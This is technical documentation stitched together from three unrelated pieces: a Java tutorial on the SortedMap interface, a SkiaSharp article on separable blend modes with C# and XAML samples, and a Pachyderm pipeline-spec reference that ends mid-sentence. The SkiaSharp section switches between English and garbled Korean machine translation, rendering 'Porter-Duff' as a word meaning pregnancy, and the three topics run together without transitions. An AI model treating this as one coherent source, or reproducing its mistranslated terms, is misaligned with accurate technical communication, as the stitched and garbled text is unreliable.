# The SortedMap Interface
A
[`SortedMap`](https://docs.oracle.com/javase/8/docs/api/java/util/SortedMap.html) is a
[`Map`](https://docs.oracle.com/javase/8/docs/api/java/util/Map.html) that maintains its entries in ascending order, sorted according to the keys' natural ordering, or according to a `Comparator` provided at the time of the `SortedMap` creation. Natural ordering and `Comparator`s are discussed in the
[Object Ordering](order.html) section. The `SortedMap` interface provides operations for normal `Map` operations and for the following:
- `Range view` — performs arbitrary range operations on the sorted map
- `Endpoints` — returns the first or the last key in the sorted map
- `Comparator access` — returns the `Comparator`, if any, used to sort the map
The following interface is the `Map` analog of
[`SortedSet`](https://docs.oracle.com/javase/8/docs/api/java/util/SortedSet.html).
```
public interface SortedMap<K, V> extends Map<K, V>{
Comparator<? super K> comparator();
SortedMap<K, V> subMap(K fromKey, K toKey);
SortedMap<K, V> headMap(K toKey);
SortedMap<K, V> tailMap(K fromKey);
K firstKey();
K lastKey();
}
```
## Map Operations
The operations `SortedMap` inherits from `Map` behave identically on sorted maps and normal maps with two exceptions:
- The `Iterator` returned by the `iterator` operation on any of the sorted map's `Collection` views traverses the collections in order.
- The arrays returned by the `Collection` views' `toArray` operations contain the keys, values, or entries in order.
Although it isn't guaranteed by the interface, the `toString` method of the `Collection` views in all the Java platform's `SortedMap` implementations returns a string containing all the elements of the view, in order.
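For example, here is a minimal sketch (the map contents are invented for illustration) showing that a `TreeMap`'s `Collection` views come back in ascending key order:

```java
import java.util.SortedMap;
import java.util.TreeMap;

public class OrderedViews {
    public static void main(String[] args) {
        SortedMap<String, Integer> m = new TreeMap<>();
        m.put("pear", 3);
        m.put("apple", 1);
        m.put("mango", 2);

        // Both Collection views iterate in ascending key order.
        System.out.println(m.keySet()); // [apple, mango, pear]
        System.out.println(m.values()); // [1, 2, 3]
    }
}
```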
## Standard Constructors
By convention, all general-purpose `Map` implementations provide a standard conversion constructor that takes a `Map`; `SortedMap` implementations are no exception. In `TreeMap`, this constructor creates an instance that orders its entries according to their keys' natural ordering. This was probably a mistake. It would have been better to check dynamically to see whether the specified `Map` instance was a `SortedMap` and, if so, to sort the new map according to the same criterion (comparator or natural ordering). Because `TreeMap` took the approach it did, it also provides a constructor that takes a `SortedMap` and returns a new `TreeMap` containing the same mappings as the given `SortedMap`, sorted according to the same criterion. Note that it is the compile-time type of the argument, not its runtime type, that determines whether the `SortedMap` constructor is invoked in preference to the ordinary `map` constructor.
`SortedMap` implementations also provide, by convention, a constructor that takes a `Comparator` and returns an empty map sorted according to the specified `Comparator`. If `null` is passed to this constructor, it returns a `Map` that sorts its mappings according to their keys' natural ordering.
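Here is a minimal sketch of both constructor conventions, using `TreeMap` (the key and value choices are invented for illustration):

```java
import java.util.SortedMap;
import java.util.TreeMap;

public class SortedMapConstructors {
    public static void main(String[] args) {
        // Comparator constructor: an empty map with a custom ordering.
        SortedMap<String, Integer> caseInsensitive =
                new TreeMap<>(String.CASE_INSENSITIVE_ORDER);
        caseInsensitive.put("Banana", 1);
        caseInsensitive.put("apple", 2);

        // SortedMap constructor: the copy keeps the same ordering criterion
        // because the compile-time type of the argument is SortedMap.
        SortedMap<String, Integer> copy = new TreeMap<>(caseInsensitive);

        System.out.println(copy.comparator() == String.CASE_INSENSITIVE_ORDER); // true
        System.out.println(copy.firstKey()); // apple
    }
}
```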
## Comparison to SortedSet
Because this interface is a precise `Map` analog of `SortedSet`, all the idioms and code examples in
[The SortedSet Interface](sorted-set.html) section apply to `SortedMap` with only trivial modifications.
---
title: The separable blend modes
description: Use the separable blend modes to alter red, green, and blue colors.
ms.prod: xamarin
ms.technology: xamarin-skiasharp
ms.assetid: 66D1A537-A247-484E-B5B9-FBCB7838FBE9
author: davidbritch
ms.author: dabritch
ms.date: 08/23/2018
ms.openlocfilehash: 8c86782d5b8b8250049d0ae060ca7bd548c5a4ef
ms.sourcegitcommit: c6ff24b524d025d7e87b7b9c25f04c740dd93497
ms.translationtype: MT
ms.contentlocale: ko-KR
ms.lasthandoff: 02/14/2019
ms.locfileid: "56240411"
---
# <a name="the-separable-blend-modes"></a>분리 가능한 blend 모드
[ 샘플 다운로드](https://developer.xamarin.com/samples/xamarin-forms/SkiaSharpForms/Demos/)
이 문서에서 볼 수 있듯이 [ **SkiaSharp Porter 임신 blend 모드**](porter-duff.md), Porter 임신 blend 모드는 일반적으로 클리핑 작업을 수행 합니다. 분리 가능한 blend 모드는 다릅니다. 분리 가능한 모드는 이미지의 개별 빨강, 녹색 및 파랑 색 구성 요소를 변경합니다. 분리 가능한 blend 모드 색의 빨강, 녹색 및 파랑 조합 흰색인 실제로 보여 주기 위해 혼합할 수 있습니다.

## <a name="lighten-and-darken-two-ways"></a>두 가지 방법으로 어둡게 및 밝게
일반적으로 어느 정도 비트맵이 너무 어둡게 또는 밝게 너무 합니다. imabe 어둡게 또는 밝게 분리 가능한 blend 모드를 사용할 수 있습니다. 분리 가능 혼합 모드의 두 실제로 [ `SKBlendMode` ](xref:SkiaSharp.SKBlendMode) 열거형 라고 `Lighten` 및 `Darken`합니다.
이러한 두 가지 모드에서 보여 합니다 **어둡게 및 밝게** 페이지입니다. XAML 파일을 두 개를 인스턴스화하고 `SKCanvasView` 개체와 두 개의 `Slider` 뷰:
```xaml
<ContentPage xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:skia="clr-namespace:SkiaSharp.Views.Forms;assembly=SkiaSharp.Views.Forms"
x:Class="SkiaSharpFormsDemos.Effects.LightenAndDarkenPage"
Title="Lighten and Darken">
<StackLayout>
<skia:SKCanvasView x:Name="lightenCanvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Slider x:Name="lightenSlider"
Margin="10"
ValueChanged="OnSliderValueChanged" />
<skia:SKCanvasView x:Name="darkenCanvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Slider x:Name="darkenSlider"
Margin="10"
ValueChanged="OnSliderValueChanged" />
</StackLayout>
</ContentPage>
```
The first `SKCanvasView` and `Slider` pair demonstrates `SKBlendMode.Lighten`, and the second pair demonstrates `SKBlendMode.Darken`. The two `Slider` views share the same `ValueChanged` handler, and the two `SKCanvasView` objects share the same `PaintSurface` handler. Both event handlers check which object fired the event:
```csharp
public partial class LightenAndDarkenPage : ContentPage
{
SKBitmap bitmap = BitmapExtensions.LoadBitmapResource(
typeof(SeparableBlendModesPage),
"SkiaSharpFormsDemos.Media.Banana.jpg");
public LightenAndDarkenPage ()
{
InitializeComponent ();
}
void OnSliderValueChanged(object sender, ValueChangedEventArgs args)
{
if ((Slider)sender == lightenSlider)
{
lightenCanvasView.InvalidateSurface();
}
else
{
darkenCanvasView.InvalidateSurface();
}
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
// Find largest size rectangle in canvas
float scale = Math.Min((float)info.Width / bitmap.Width,
(float)info.Height / bitmap.Height);
SKRect rect = SKRect.Create(scale * bitmap.Width, scale * bitmap.Height);
float x = (info.Width - rect.Width) / 2;
float y = (info.Height - rect.Height) / 2;
rect.Offset(x, y);
// Display bitmap
canvas.DrawBitmap(bitmap, rect);
// Display gray rectangle with blend mode
using (SKPaint paint = new SKPaint())
{
if ((SKCanvasView)sender == lightenCanvasView)
{
byte value = (byte)(255 * lightenSlider.Value);
paint.Color = new SKColor(value, value, value);
paint.BlendMode = SKBlendMode.Lighten;
}
else
{
byte value = (byte)(255 * (1 - darkenSlider.Value));
paint.Color = new SKColor(value, value, value);
paint.BlendMode = SKBlendMode.Darken;
}
canvas.DrawRect(rect, paint);
}
}
}
```
The `PaintSurface` handler calculates a rectangle suitable for the bitmap. The handler displays that bitmap and then displays a rectangle over it using an `SKPaint` object with its `BlendMode` property set to `SKBlendMode.Lighten` or `SKBlendMode.Darken`. The `Color` property is a gray shade based on the `Slider`. For the `Lighten` mode the color ranges from black to white, and for the `Darken` mode it ranges from white to black.

The screenshots from left to right show increasingly larger `Slider` values, as the top image gets lighter and the bottom image gets darker:
[](separable-images/LightenAndDarken-Large.png#lightbox)
This program demonstrates the usual way to use the separable blend modes: The destination is very often a bitmap of some sort. The source is a rectangle displayed with an `SKPaint` object whose `BlendMode` property is set to a separable blend mode. The rectangle can be a solid color (as it is here) or a gradient. Transparency is _not_ generally used with the separable blend modes.

As you experiment with this program, you'll discover that these two blend modes do not lighten and darken the image uniformly. Instead, the `Slider` seems to set a threshold of some sort. For example, as you increase the `Slider` for the `Lighten` mode, the darker areas of the image get light first while the lighter areas stay the same.

For the `Lighten` mode, if the destination pixel is the RGB color (Dr, Dg, Db) and the source pixel is the color (Sr, Sg, Sb), then the output (Or, Og, Ob) is calculated like this:
`Or = max(Dr, Sr)`

`Og = max(Dg, Sg)`

`Ob = max(Db, Sb)`
For red, green, and blue separately, the result is the greater of the destination and source. This produces the effect of lightening the dark areas of the destination first.

The `Darken` mode is similar except that the result is the lesser of the destination and source:

`Or = min(Dr, Sr)`

`Og = min(Dg, Sg)`

`Ob = min(Db, Sb)`

The red, green, and blue components are each handled separately, which is why these blend modes are called the _separable_ blend modes. For this reason, the abbreviations **Dc** and **Sc** can be used for the destination and source colors, with the understanding that the calculation applies to each of the red, green, and blue components separately.
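To make the per-channel arithmetic concrete, here is a minimal stand-alone C# sketch (the `Blend` helper and the pixel values are invented for illustration; they are not part of SkiaSharp or the sample code):

```csharp
using System;

static class SeparableBlendDemo
{
    // Applies one per-channel operation to a destination and a source color.
    static (byte R, byte G, byte B) Blend(
        (byte R, byte G, byte B) d,
        (byte R, byte G, byte B) s,
        Func<byte, byte, byte> op) =>
        (op(d.R, s.R), op(d.G, s.G), op(d.B, s.B));

    static void Main()
    {
        var dest = ((byte)40, (byte)200, (byte)90);   // destination pixel (Dr, Dg, Db)
        var src = ((byte)128, (byte)128, (byte)128);  // source pixel (Sr, Sg, Sb)

        Console.WriteLine(Blend(dest, src, Math.Max)); // Lighten: (128, 200, 128)
        Console.WriteLine(Blend(dest, src, Math.Min)); // Darken:  (40, 128, 90)
    }
}
```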
The following table shows the separable blend modes with brief descriptions of what they do. The second column shows the source color that produces no change:

| Blend mode   | No change | Operation |
| ------------ | --------- | --------- |
| `Plus`       | Black | Lightens by adding colors: Sc + Dc |
| `Modulate`   | White | Darkens by multiplying colors: Sc·Dc |
| `Screen`     | Black | Complements the product of complements: Sc + Dc – Sc·Dc |
| `Overlay`    | Gray  | Inverse of `HardLight` |
| `Darken`     | White | Minimum of colors: min(Sc, Dc) |
| `Lighten`    | Black | Maximum of colors: max(Sc, Dc) |
| `ColorDodge` | Black | Lightens destination based on source |
| `ColorBurn`  | White | Darkens destination based on source |
| `HardLight`  | Gray  | Similar to the effect of a harsh spotlight |
| `SoftLight`  | Gray  | Similar to the effect of a soft spotlight |
| `Difference` | Black | Subtracts the darker from the lighter: Abs(Dc – Sc) |
| `Exclusion`  | Black | Similar to `Difference` but with lower contrast |
| `Multiply`   | White | Darkens by multiplying colors: Sc·Dc |
Detailed algorithms can be found in the W3C [**Compositing and Blending Level 1**](https://www.w3.org/TR/compositing-1/) specification and the Skia [**SkBlendMode Reference**](https://skia.org/user/api/SkBlendMode_Reference), although the notation in these two sources isn't the same. Keep in mind that `Plus` is commonly regarded as a Porter-Duff blend mode, and `Modulate` is not part of the W3C specification.

If the source is transparent, then all the separable blend modes except `Modulate` have no effect. As you've seen earlier, the `Modulate` blend mode incorporates the alpha channel in the multiplication. Otherwise, `Modulate` has the same effect as `Multiply`.

Notice the two modes named `ColorDodge` and `ColorBurn`. The words _dodge_ and _burn_ originated in photographic darkroom practices. An enlarger makes a photographic print by shining light through a negative. With no light, the print is white. The print gets darker as more light falls on it for longer periods of time. Print makers often used a hand or a small object to block some of the light from falling on a particular part of the print, making that area lighter. This is known as _dodging_. Conversely, opaque material with a hole in it (or hands blocking most of the light) could be used to direct more light at a particular spot to darken it, which is called _burning_.

The **Dodge and Burn** program is very similar to **Lighten and Darken**. The XAML file is structured the same but with different element names, and the code-behind file is likewise quite similar, but the effect of these two blend modes is quite different:
[](separable-images/DodgeAndBurn-Large.png#lightbox)
At small `Slider` values, the `Lighten` mode lightens the darkest areas first, while `ColorDodge` lightens more uniformly.

Image-processing application programs often allow dodging and burning to be restricted to specific areas, just as in a darkroom. That can be accomplished with gradients, or with a bitmap of varying shades of gray.
## <a name="exploring-the-separable-blend-modes"></a>분리 가능한 blend 모드를 탐색합니다.
합니다 **분리 가능한 Blend 모드** 페이지를 사용 하면 모든 분리 가능한 blend 모드를 검사할 수 있습니다. 비트맵 대상과 blend 모드 중 하나를 사용 하 여 색이 칠해진된 사각형 원본을 표시 합니다.
XAML 파일은 정의 `Picker` (blend 모드를 선택)를와 네 개의 슬라이더입니다. 처음 세 개의 슬라이더 원본의 빨강, 녹색 및 파랑 구성 요소를 설정할 수 있습니다. 네 번째 슬라이더는 회색 음영을 설정 하 여 해당 값을 재정의 하는 데 사용 됩니다. 개별 슬라이더 식별 되지 않습니다 하지만 색 해당 함수를 나타냅니다.
```xaml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://xamarin.com/schemas/2014/forms"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:skia="clr-namespace:SkiaSharp;assembly=SkiaSharp"
xmlns:skiaviews="clr-namespace:SkiaSharp.Views.Forms;assembly=SkiaSharp.Views.Forms"
x:Class="SkiaSharpFormsDemos.Effects.SeparableBlendModesPage"
Title="Separable Blend Modes">
<StackLayout>
<skiaviews:SKCanvasView x:Name="canvasView"
VerticalOptions="FillAndExpand"
PaintSurface="OnCanvasViewPaintSurface" />
<Picker x:Name="blendModePicker"
Title="Blend Mode"
Margin="10, 0"
SelectedIndexChanged="OnPickerSelectedIndexChanged">
<Picker.ItemsSource>
<x:Array Type="{x:Type skia:SKBlendMode}">
<x:Static Member="skia:SKBlendMode.Plus" />
<x:Static Member="skia:SKBlendMode.Modulate" />
<x:Static Member="skia:SKBlendMode.Screen" />
<x:Static Member="skia:SKBlendMode.Overlay" />
<x:Static Member="skia:SKBlendMode.Darken" />
<x:Static Member="skia:SKBlendMode.Lighten" />
<x:Static Member="skia:SKBlendMode.ColorDodge" />
<x:Static Member="skia:SKBlendMode.ColorBurn" />
<x:Static Member="skia:SKBlendMode.HardLight" />
<x:Static Member="skia:SKBlendMode.SoftLight" />
<x:Static Member="skia:SKBlendMode.Difference" />
<x:Static Member="skia:SKBlendMode.Exclusion" />
<x:Static Member="skia:SKBlendMode.Multiply" />
</x:Array>
</Picker.ItemsSource>
<Picker.SelectedIndex>
0
</Picker.SelectedIndex>
</Picker>
<Slider x:Name="redSlider"
MinimumTrackColor="Red"
MaximumTrackColor="Red"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="greenSlider"
MinimumTrackColor="Green"
MaximumTrackColor="Green"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="blueSlider"
MinimumTrackColor="Blue"
MaximumTrackColor="Blue"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Slider x:Name="graySlider"
MinimumTrackColor="Gray"
MaximumTrackColor="Gray"
Margin="10, 0"
ValueChanged="OnSliderValueChanged" />
<Label x:Name="colorLabel"
HorizontalTextAlignment="Center" />
</StackLayout>
</ContentPage>
```
The code-behind file loads one of the bitmap resources and draws it twice on the canvas, once in the top half and once in the bottom half:
```csharp
public partial class SeparableBlendModesPage : ContentPage
{
SKBitmap bitmap = BitmapExtensions.LoadBitmapResource(
typeof(SeparableBlendModesPage),
"SkiaSharpFormsDemos.Media.Banana.jpg");
public SeparableBlendModesPage()
{
InitializeComponent();
}
void OnPickerSelectedIndexChanged(object sender, EventArgs args)
{
canvasView.InvalidateSurface();
}
void OnSliderValueChanged(object sender, ValueChangedEventArgs e)
{
if (sender == graySlider)
{
redSlider.Value = greenSlider.Value = blueSlider.Value = graySlider.Value;
}
colorLabel.Text = String.Format("Color = {0:X2} {1:X2} {2:X2}",
(byte)(255 * redSlider.Value),
(byte)(255 * greenSlider.Value),
(byte)(255 * blueSlider.Value));
canvasView.InvalidateSurface();
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
// Draw bitmap in top half
SKRect rect = new SKRect(0, 0, info.Width, info.Height / 2);
canvas.DrawBitmap(bitmap, rect, BitmapStretch.Uniform);
        // Draw bitmap in bottom half
rect = new SKRect(0, info.Height / 2, info.Width, info.Height);
canvas.DrawBitmap(bitmap, rect, BitmapStretch.Uniform);
// Get values from XAML controls
SKBlendMode blendMode =
(SKBlendMode)(blendModePicker.SelectedIndex == -1 ?
0 : blendModePicker.SelectedItem);
SKColor color = new SKColor((byte)(255 * redSlider.Value),
(byte)(255 * greenSlider.Value),
(byte)(255 * blueSlider.Value));
// Draw rectangle with blend mode in bottom half
using (SKPaint paint = new SKPaint())
{
paint.Color = color;
paint.BlendMode = blendMode;
canvas.DrawRect(rect, paint);
}
}
}
```
Toward the bottom of the `PaintSurface` handler, a rectangle is drawn over the second bitmap with the selected blend mode and the selected color. You can compare the modified bitmap at the bottom with the original bitmap at the top:
[](separable-images/SeparableBlendModes-Large.png#lightbox)
## <a name="additive-and-subtractive-primary-colors"></a>가산 및 무언가 감 기본 색
합니다 **기본 색** 페이지는 빨강, 녹색 및 파랑의 세 가지 겹치는 원을 그립니다.
[](separable-images/PrimaryColors-Additive.png#lightbox)
These are the additive primary colors. Combinations of any two produce cyan, magenta, and yellow, and the combination of all three is white.

These three circles are drawn with the `SKBlendMode.Plus` mode, but you could also use the `Screen`, `Lighten`, or `Difference` mode for the same effect. Here's the program:
```csharp
public class PrimaryColorsPage : ContentPage
{
bool isSubtractive;
public PrimaryColorsPage ()
{
Title = "Primary Colors";
SKCanvasView canvasView = new SKCanvasView();
canvasView.PaintSurface += OnCanvasViewPaintSurface;
// Switch between additive and subtractive primaries at tap
TapGestureRecognizer tap = new TapGestureRecognizer();
tap.Tapped += (sender, args) =>
{
isSubtractive ^= true;
canvasView.InvalidateSurface();
};
canvasView.GestureRecognizers.Add(tap);
Content = canvasView;
}
void OnCanvasViewPaintSurface(object sender, SKPaintSurfaceEventArgs args)
{
SKImageInfo info = args.Info;
SKSurface surface = args.Surface;
SKCanvas canvas = surface.Canvas;
canvas.Clear();
SKPoint center = new SKPoint(info.Rect.MidX, info.Rect.MidY);
float radius = Math.Min(info.Width, info.Height) / 4;
float distance = 0.8f * radius; // from canvas center to circle center
SKPoint center1 = center +
new SKPoint(distance * (float)Math.Cos(9 * Math.PI / 6),
distance * (float)Math.Sin(9 * Math.PI / 6));
SKPoint center2 = center +
new SKPoint(distance * (float)Math.Cos(1 * Math.PI / 6),
distance * (float)Math.Sin(1 * Math.PI / 6));
SKPoint center3 = center +
new SKPoint(distance * (float)Math.Cos(5 * Math.PI / 6),
distance * (float)Math.Sin(5 * Math.PI / 6));
using (SKPaint paint = new SKPaint())
{
if (!isSubtractive)
{
paint.BlendMode = SKBlendMode.Plus;
System.Diagnostics.Debug.WriteLine(paint.BlendMode);
paint.Color = SKColors.Red;
canvas.DrawCircle(center1, radius, paint);
paint.Color = SKColors.Lime; // == (00, FF, 00)
canvas.DrawCircle(center2, radius, paint);
paint.Color = SKColors.Blue;
canvas.DrawCircle(center3, radius, paint);
}
else
{
                paint.BlendMode = SKBlendMode.Multiply;
System.Diagnostics.Debug.WriteLine(paint.BlendMode);
paint.Color = SKColors.Cyan;
canvas.DrawCircle(center1, radius, paint);
paint.Color = SKColors.Magenta;
canvas.DrawCircle(center2, radius, paint);
paint.Color = SKColors.Yellow;
canvas.DrawCircle(center3, radius, paint);
}
}
}
}
```
The program includes a `TapGestureRecognizer`. When you tap or click the screen, the program uses `SKBlendMode.Multiply` to display the three subtractive primaries:
[](separable-images/PrimaryColors-Subtractive-Large.png#lightbox)
The `Darken` mode also works for this same effect.
## <a name="related-links"></a>관련 링크
- [SkiaSharp Api](https://docs.microsoft.com/dotnet/api/skiasharp)
- [SkiaSharpFormsDemos (샘플)](https://developer.xamarin.com/samples/xamarin-forms/SkiaSharpForms/Demos/)
# Pipeline Specification
This document discusses each of the fields present in a pipeline specification.
To see how to use a pipeline spec to create a pipeline, refer to the [pachctl
create-pipeline](../pachctl/pachctl_create-pipeline.html) doc.
## JSON Manifest Format
```json
{
"pipeline": {
"name": string
},
"description": string,
"transform": {
"image": string,
"cmd": [ string ],
"stdin": [ string ]
"env": {
string: string
},
"secrets": [ {
"name": string,
"mount_path": string
},
{
"name": string,
"env_var": string,
"key": string
} ],
"image_pull_secrets": [ string ],
"accept_return_code": [ int ],
"debug": bool,
"user": string,
"working_dir": string,
},
"parallelism_spec": {
// Set at most one of the following:
"constant": int,
"coefficient": double
},
"resource_requests": {
"memory": string,
"cpu": double
},
"resource_limits": {
"memory": string,
"cpu": double,
"gpu": double
},
"datum_timeout": string,
"job_timeout": string,
"input": {
<"atom", "cross", "union", "cron", or "git" see below>
},
"output_branch": string,
"egress": {
"URL": "s3://bucket/dir"
},
"standby": bool,
"incremental": bool,
"cache_size": string,
"enable_stats": bool,
"service": {
"internal_port": int,
"external_port": int
},
"max_queue_size": int,
"chunk_spec": {
"number": int,
"size_bytes": int
}
}
------------------------------------
"atom" input
------------------------------------
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
------------------------------------
"cross" or "union" input
------------------------------------
"cross" or "union": [
{
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
},
{
"atom": {
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
}
etc...
]
------------------------------------
"cron" input
------------------------------------
"cron": {
"name": string,
"spec": string,
"repo": string,
"start": time
}
------------------------------------
"git" input
------------------------------------
"git": {
"URL": string,
"name": string,
"branch": string
}
```
In practice, you rarely need to specify all the fields. Most fields either come with sensible defaults or can be nil. Following is an example of a minimal spec:
```json
{
"pipeline": {
"name": "wordcount"
},
"transform": {
"image": "wordcount-image",
"cmd": ["/binary", "/pfs/data", "/pfs/out"]
},
"input": {
"atom": {
"repo": "data",
"glob": "/*"
}
}
}
```
Following is a walk-through of all the fields.
### Name (required)
`pipeline.name` is the name of the pipeline that you are creating. Each
pipeline needs to have a unique name. Pipeline names must:
- contain only alphanumeric characters, `_` and `-`
- begin or end with only alphanumeric characters (not `_` or `-`)
- be no more than 50 characters in length
### Description (optional)
`description` is an optional text field where you can put documentation about the pipeline.
### Transform (required)
`transform.image` is the name of the Docker image that your jobs run in.
`transform.cmd` is the command passed to the Docker run invocation. Note that
as with Docker, cmd is not run inside a shell which means that things like
wildcard globbing (`*`), pipes (`|`) and file redirects (`>` and `>>`) will not
work. To get that behavior, you can set `cmd` to be a shell of your choice
(e.g. `sh`) and pass a shell script to stdin.
`transform.stdin` is an array of lines that are sent to your command on stdin.
Lines need not end in newline characters.
`transform.env` is a map from key to value of environment variables that will be
injected into the container
`transform.secrets` is an array of secrets, they are useful for embedding
sensitive data such as credentials. Secrets reference Kubernetes secrets by
name and specify a path that the secrets should be mounted to, or an
environment variable (`env_var`) that the value should be bound to. Secrets
must set `name` which should be the name of a secret in Kubernetes. Secrets
must also specify either `mount_path` or `env_var` and `key`. You can read
more about Kubernetes secrets
[here](https://kubernetes.io/docs/concepts/configuration/secret/).
`transform.image_pull_secrets` is an array of image pull secrets, image pull
secrets are similar to secrets except that they're mounted before the
containers are created so they can be used to provide credentials for image
pulling. For example, if you are using a private Docker registry for your
images, you can specify it via:
```sh
$ kubectl create secret docker-registry myregistrykey --docker-server=DOCKER_REGISTRY_SERVER --docker-username=DOCKER_USER --docker-password=DOCKER_PASSWORD --docker-email=DOCKER_EMAIL
```
And then tell your pipeline about it via `"image_pull_secrets": [ "myregistrykey" ]`. Read more about image pull secrets
[here](https://kubernetes.io/docs/concepts/containers/images/#specifying-imagepullsecrets-on-a-pod).
`transform.accept_return_code` is an array of return codes (i.e. exit codes)
from your docker command that are considered acceptable, which means that
if your docker command exits with one of the codes in this array, it will
be considered a successful run for the purpose of setting job status. `0`
is always considered a successful exit code.
`transform.debug` turns on added debug logging for the pipeline.
`transform.user` sets the user that your code runs as, this can also be
accomplished with a `USER` directive in your Dockerfile.
`transform.working_dir` sets the directory that your command will be run from,
this can also be accomplished with a `WORKDIR` directive in your Dockerfile.
### Parallelism Spec (optional)
`parallelism_spec` describes how Pachyderm should parallelize your pipeline.
Currently, Pachyderm has two parallelism strategies: `constant` and
`coefficient`.
If you set the `constant` field, Pachyderm will start the number of workers
that you specify. For example, set `"constant":10` to use 10 workers.
If you set the `coefficient` field, Pachyderm will start a number of workers
that is a multiple of your Kubernetes cluster’s size. For example, if your
Kubernetes cluster has 10 nodes, and you set `"coefficient": 0.5`, Pachyderm
will start five workers. If you set it to 2.0, Pachyderm will start 20 workers
(two per Kubernetes node).
By default, we use the parallelism spec "coefficient=1", which means that
we spawn one worker per node for this pipeline.
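For example, a hypothetical pipeline pinned to exactly ten workers would include:

```json
"parallelism_spec": {
  "constant": 10
}
```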
### Resource Requests (optional)
`resource_requests` describes the amount of resources you expect the
workers for a given pipeline to consume. Knowing this in advance
lets us schedule big jobs on separate machines, so that they don't
conflict and either slow down or die.
The `memory` field is a string that describes the amount of memory, in bytes,
each worker needs (with allowed SI suffixes (M, K, G, Mi, Ki, Gi, etc). For
example, a worker that needs to read a 1GB file into memory might set
`"memory": "1.2G"` (with a little extra for the code to use in addition to the
file. Workers for this pipeline will only be placed on machines with at least
1.2GB of free memory, and other large workers will be prevented from using it
(if they also set their `resource_requests`).
The `cpu` field is a double that describes the amount of CPU time (in (cpu
seconds)/(real seconds) each worker needs. Setting `"cpu": 0.5` indicates that
the worker should get 500ms of CPU time per second. Setting `"cpu": 2`
indicates that the worker should get 2000ms of CPU time per second (i.e. it's
using 2 CPUs, essentially, though worker threads might spend e.g. 500ms on four
physical CPUs instead of one second on two physical CPUs).
In both cases, the resource requests are not upper bounds. If the worker uses
more memory than it's requested, it will not (necessarily) be killed. However,
if the whole node runs out of memory, Kubernetes will start killing pods that
have been placed on it and exceeded their memory request, to reclaim memory.
To prevent your worker getting killed, you must set your `memory` request to
a sufficiently large value. However, if the total memory requested by all
workers in the system is too large, Kubernetes will be unable to schedule new
workers (because no machine will have enough unclaimed memory). `cpu` works
similarly, but for CPU time.
By default, workers are scheduled with an effective resource request of 0 (to
avoid scheduling problems that prevent users from being unable to run
pipelines). This means that if a node runs out of memory, any such worker
might be killed.
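As an illustrative sketch, a pipeline whose workers each read a roughly 1GB file into memory and need about half a CPU might request:

```json
"resource_requests": {
  "memory": "1.2G",
  "cpu": 0.5
}
```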
### Resource Limits (optional)
`resource_limits` describes the upper threshold of allowed resources a given
worker can consume. If a worker exceeds this value, it will be evicted.
### Datum Timeout (optional)
`datum_timeout` is a string (e.g. `1s`, `5m`, or `15h`) that determines the
maximum execution time allowed per datum. So no matter what your parallelism
or number of datums, no single datum is allowed to exceed this value.
### Job Timeout (optional)
`job_timeout` is a string (e.g. `1s`, `5m`, or `15h`) that determines the
maximum execution time allowed for a job. It differs from `datum_timeout`
in that the limit gets applied across all workers and all datums. That
means that you'll need to keep in mind the parallelism, total number of
datums, and execution time per datum when setting this value. Keep in
mind that the number of datums may change over jobs. Some new commits may
have a bunch of new files (and so new datums). Some may have fewer.
### Input (required)
`input` specifies repos that will be visible to the jobs during runtime.
Commits to these repos will automatically trigger the pipeline to create new
jobs to process them. Input is a recursive type, there are multiple different
kinds of inputs which can be combined together. The `input` object is a
container for the different input types with a field for each, only one of
these fields be set for any instantiation of the object.
```
{
"atom": atom_input,
"union": [input],
"cross": [input],
"cron": cron_input
}
```
#### Atom Input
Atom inputs are the simplest inputs, they take input from a single branch on a
single repo.
```
{
"name": string,
"repo": string,
"branch": string,
"glob": string,
"lazy" bool,
"empty_files": bool
}
```
`input.atom.name` is the name of the input. An input with name `XXX` will be
visible under the path `/pfs/XXX` when a job runs. Input names must be unique
if the inputs are crossed, but they may be duplicated between `AtomInput`s that are unioned. This is because when `AtomInput`s are unioned, you'll only ever see a datum from one input at a time. Overlapping the names of unioned inputs allows
you to write simpler code since you no longer need to consider which input directory a particular datum come from. If an input's name is not specified, it defaults to the name of the repo. Therefore, if you have two crossed inputs from the same repo, you'll be required to give at least one of them a unique name.
`input.atom.repo` is the `repo` to be used for the input.
`input.atom.branch` is the `branch` to watch for commits on, it may be left blank in
which case `"master"` will be used.
`input.atom.glob` is a glob pattern that's used to determine how the input data
is partitioned. It's explained in detail in the next section.
`input.atom.lazy` controls how the data is exposed to jobs. The default is `false`
which means the job will eagerly download the data it needs to process and it
will be exposed as normal files on disk. If lazy is set to `true`, data will be
exposed as named pipes instead and no data will be downloaded until the job
opens the pipe and reads it, if the pipe is never opened then no data will be
downloaded. Some applications won't work with pipes, for example if they make
syscalls such as `Seek` which pipes don't support. Applications that can work
with pipes should use them since they're more performant, the difference will
be especially notable if the job only reads a subset of the files that are
available to it. Note that `lazy` currently doesn't support datums that
contain more than 10000 files.
`input.atom.empty_files` controls how files are exposed to jobs. If true, it will
cause files from this atom to be presented as empty files. This is useful in shuffle
pipelines where you want to read the names of files and reorganize them using symlinks.
#### Union Input
Union inputs take the union of other inputs. For example:
```
| inputA | inputB | inputA ∪ inputB |
| ------ | ------ | --------------- |
| foo | fizz | foo |
| bar | buzz | fizz |
| | | bar |
| | | buzz |
```
Notice that union inputs do not take a name and maintain the names of the
sub-inputs. In the above example you would see files under
